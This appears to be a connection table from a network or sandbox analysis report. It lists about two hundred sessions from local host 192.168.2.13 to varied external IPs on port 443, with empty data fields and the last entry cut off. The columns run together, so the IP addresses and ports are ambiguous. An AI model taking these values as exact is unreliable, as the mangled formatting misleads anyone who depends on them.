                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11558192.168.2.1339676221.139.225.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11559192.168.2.134814057.255.178.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11560192.168.2.1359290208.204.27.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11561192.168.2.135473244.249.26.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11562192.168.2.133977097.181.20.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11563192.168.2.1355122220.76.77.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11564192.168.2.135103477.193.133.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11565192.168.2.1344616210.93.90.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11566192.168.2.134562024.226.96.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11567192.168.2.134870037.41.158.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11568192.168.2.1347550207.45.63.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11569192.168.2.135583636.14.44.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11570192.168.2.134109487.171.69.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11571192.168.2.1338900173.82.48.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11572192.168.2.1348044174.100.63.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11573192.168.2.1358548180.226.137.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11574192.168.2.1344126122.31.133.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11575192.168.2.1338330208.153.17.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11576192.168.2.1335028205.233.16.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11577192.168.2.135024648.117.97.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11578192.168.2.135164263.12.202.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11579192.168.2.134315486.60.132.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11580192.168.2.135772873.128.133.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11581192.168.2.133809619.186.95.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11582192.168.2.134000649.153.101.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11583192.168.2.1351120110.54.132.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11584192.168.2.1348060117.8.137.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11585192.168.2.134196889.45.77.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11586192.168.2.1357242164.82.150.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11587192.168.2.1335004139.58.119.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11588192.168.2.1340176141.234.127.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11589192.168.2.1346946160.29.190.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11590192.168.2.1341474204.230.7.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11591192.168.2.1353208113.78.6.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11592192.168.2.134880892.214.43.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11593192.168.2.13582604.70.171.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11594192.168.2.13580509.205.86.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11595192.168.2.1343360216.246.58.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11596192.168.2.1350776222.27.193.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11597192.168.2.135356880.149.42.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11598192.168.2.1344814196.10.134.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11599192.168.2.1337166196.142.101.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11600192.168.2.1354954184.54.15.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11601192.168.2.1352494150.251.51.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11602192.168.2.1349306108.206.50.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11603192.168.2.1344538198.47.211.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11604192.168.2.135444035.240.214.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11605192.168.2.133382627.145.200.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11606192.168.2.1355396161.209.136.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11607192.168.2.134583249.240.5.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11608192.168.2.1349118103.219.33.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11609192.168.2.134029041.84.231.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11610192.168.2.1339280140.214.200.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11611192.168.2.1341488166.210.36.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11612192.168.2.134909293.231.195.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11613192.168.2.1334204120.162.141.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11614192.168.2.1351710139.243.20.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11615192.168.2.1352518140.174.24.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11616192.168.2.1360924101.255.46.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11617192.168.2.136068625.39.197.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11618192.168.2.1333712158.58.196.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11619192.168.2.1344074181.243.125.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11620192.168.2.1342858211.228.28.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11621192.168.2.134060876.104.214.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11622192.168.2.133728448.240.201.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11623192.168.2.133360820.65.122.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11624192.168.2.13521905.83.94.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11625192.168.2.133841897.60.100.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11626192.168.2.1334760160.58.168.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11627192.168.2.1344888203.131.80.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11628192.168.2.1342570113.229.97.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11629192.168.2.1352474212.192.165.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11630192.168.2.1356486134.155.24.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11631192.168.2.1335976219.176.202.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11632192.168.2.1345196131.65.181.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11633192.168.2.134167458.95.140.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11634192.168.2.1335896156.243.110.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11635192.168.2.1340444209.9.9.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11636192.168.2.133874274.241.175.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11637192.168.2.134832675.118.6.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11638192.168.2.13394102.89.139.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11639192.168.2.1360374151.91.99.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11640192.168.2.135850445.207.171.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11641192.168.2.1358462202.243.148.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11642192.168.2.1339774117.114.6.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11643192.168.2.135737473.134.83.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11644192.168.2.13358185.128.42.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11645192.168.2.134926034.236.207.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11646192.168.2.1352752140.63.81.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11647192.168.2.1346382148.151.246.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11648192.168.2.1347766140.72.22.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11649192.168.2.1341006130.11.229.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11650192.168.2.134069037.44.197.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11651192.168.2.1333664191.164.117.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11652192.168.2.134166886.201.195.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11653192.168.2.1353856131.182.135.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11654192.168.2.134598476.88.42.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11655192.168.2.1360006120.197.192.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11656192.168.2.1357196218.91.87.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11657192.168.2.133692823.128.174.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11658192.168.2.1350308104.129.236.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11659192.168.2.134548887.105.225.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11660192.168.2.134707876.30.163.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11661192.168.2.1336512166.171.37.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11662192.168.2.1357668220.77.68.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11663192.168.2.136082448.108.206.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11664192.168.2.135147624.141.159.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11665192.168.2.134840457.221.26.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11666192.168.2.134862075.6.212.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11667192.168.2.1355726143.2.203.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11668192.168.2.1337586168.248.173.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11669192.168.2.1356572158.9.143.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11670192.168.2.1354352161.26.244.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11671192.168.2.134199482.8.55.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11672192.168.2.1347254203.2.22.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11673192.168.2.1358436172.114.154.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11674192.168.2.135273289.147.246.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11675192.168.2.135762483.191.184.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11676192.168.2.135571485.74.153.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11677192.168.2.1338974211.103.54.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11678192.168.2.134455253.172.211.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11679192.168.2.1345386178.21.68.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11680192.168.2.135153244.84.121.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11681192.168.2.1352948102.126.108.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11682192.168.2.1342858181.54.166.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11683192.168.2.13529608.158.59.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11684192.168.2.136091840.124.180.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11685192.168.2.1357408141.187.180.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11686192.168.2.135537661.169.31.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11687192.168.2.134823436.94.148.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11688192.168.2.1341216119.133.244.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11689192.168.2.133688414.92.183.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11690192.168.2.135140461.211.251.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11691192.168.2.1347218189.133.181.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11692192.168.2.1337654167.219.145.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11693192.168.2.1344118158.113.151.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11694192.168.2.1350724190.132.177.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11695192.168.2.1335674191.252.231.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11696192.168.2.1347982154.227.189.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11697192.168.2.1353446149.18.44.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11698192.168.2.1351018173.34.15.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11699192.168.2.133369286.20.28.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11700192.168.2.1352110174.31.2.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11701192.168.2.1350076157.111.25.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11702192.168.2.1333106149.89.204.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11703192.168.2.1356024117.83.112.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11704192.168.2.133999676.45.126.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11705192.168.2.135742495.78.152.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11706192.168.2.1358544132.222.54.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11707192.168.2.1349390194.208.118.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11708192.168.2.134758857.235.44.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11709192.168.2.1342186146.198.30.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11710192.168.2.135331299.191.129.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11711192.168.2.1349974177.176.224.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11712192.168.2.134065480.148.178.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11713192.168.2.133902047.223.48.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11714192.168.2.134799894.39.99.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11715192.168.2.1340382177.211.228.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11716192.168.2.133485651.57.13.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11717192.168.2.1341752146.39.89.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11718192.168.2.1342308124.139.120.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11719192.168.2.1355054136.254.154.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11720192.168.2.134090654.6.85.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11721192.168.2.133754293.116.51.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11722192.168.2.135389670.108.1.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11723192.168.2.1343056159.234.44.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11724192.168.2.1352738147.108.64.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11725192.168.2.1338256149.214.142.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11726192.168.2.1339138105.8.18.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11727192.168.2.134070478.192.210.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11728192.168.2.1338494158.214.161.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11729192.168.2.133565081.155.254.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11730192.168.2.1355936211.114.60.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11731192.168.2.1358200221.203.56.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11732192.168.2.135408266.70.33.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11733192.168.2.133526059.238.154.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11734192.168.2.13416324.71.61.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11735192.168.2.1359620121.212.75.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11736192.168.2.135388464.163.57.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11737192.168.2.13542741.255.61.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11738192.168.2.134981441.29.104.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11739192.168.2.1346270157.123.186.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11740192.168.2.1347352180.201.140.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11741192.168.2.134645693.231.88.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11742192.168.2.1345886134.214.139.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11743192.168.2.133507675.79.135.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11744192.168.2.1345168136.113.44.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11745192.168.2.134519036.182.70.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11746192.168.2.135825684.4.24.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11747192.168.2.1360438108.190.181.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11748192.168.2.1345890117.58.31.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11749192.168.2.1337094170.100.227.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11750192.168.2.1347320157.107.123.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11751192.168.2.134324661.184.84.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11752192.168.2.1337320125.129.26.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11753192.168.2.134291632.10.78.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11754192.168.2.1342622176.208.155.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11755192.168.2.134648027.197.128.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11756192.168.2.133911897.116.224.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11757192.168.2.1347430129.198.94.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11758192.168.2.1339402151.184.10.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11759192.168.2.1349694208.208.17.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11760192.168.2.134770275.162.33.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11761192.168.2.1341734158.99.141.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11762192.168.2.1333330117.64.248.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11763192.168.2.13509708.127.211.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11764192.168.2.134586014.126.221.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11765192.168.2.133527283.167.136.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11766192.168.2.134034065.192.53.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11767192.168.2.133644245.233.102.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11768192.168.2.1345528140.105.134.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11769192.168.2.134824288.133.68.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
